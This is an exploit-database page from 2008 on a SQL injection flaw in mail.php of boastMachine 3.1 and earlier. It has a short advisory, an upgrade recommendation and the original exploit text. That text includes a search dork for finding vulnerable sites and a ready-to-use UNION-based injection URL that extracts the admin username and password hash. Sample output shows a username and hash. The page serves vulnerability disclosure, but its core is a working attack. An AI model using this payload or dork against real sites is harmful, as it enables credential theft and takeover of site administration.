boastMachine - exploit.company

vendor:

boastMachine

by:

virangar security team(hadihadi)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: boastMachine

Affected Version From: 3.1 and prior

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

boastMachine <=3.1 SQL Injection Vulnerbility

A SQL injection vulnerability exists in boastMachine version 3.1 and prior. An attacker can exploit this vulnerability to gain access to the admin panel of the application. The vulnerability is due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'mail.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. This can allow the attacker to gain access to the admin panel of the application.

Mitigation:

Upgrade to the latest version of boastMachine.

Source

Exploit-DB raw data:

########################################################################
#                                                                      #
#    ...:::::boastMachine <=3.1 SQL Injection Vulnerbility ::::....    #           
########################################################################

Virangar Security Team

www.virangar.org
www.virangar.net

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) from emperor team :x
-----------------------------------
dork: Powered by boastMachine v3.1
-----------------------------------
vuln:
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=[blog_id]
example:
http://localhost/bm/mail.php?id='/**/union/**/select/**/1,2,concat(user_login,char(58),user_pass),4/**/from/**/bmc_users/**/where/**/id=1/*&blog=1
-------------------------------------
you can see somting simillar to:
Send the post "swagger:e74c7cc56d033d32b8cb465c2bbc379b" to a friend
#############
'swagger' is admin user & 'e74c7cc56d033d32b8cb465c2bbc379b' is encoded admin password ;)
-------------------------------------
mybe other versions are Vulnerbil too :)

# milw0rm.com [2008-01-21]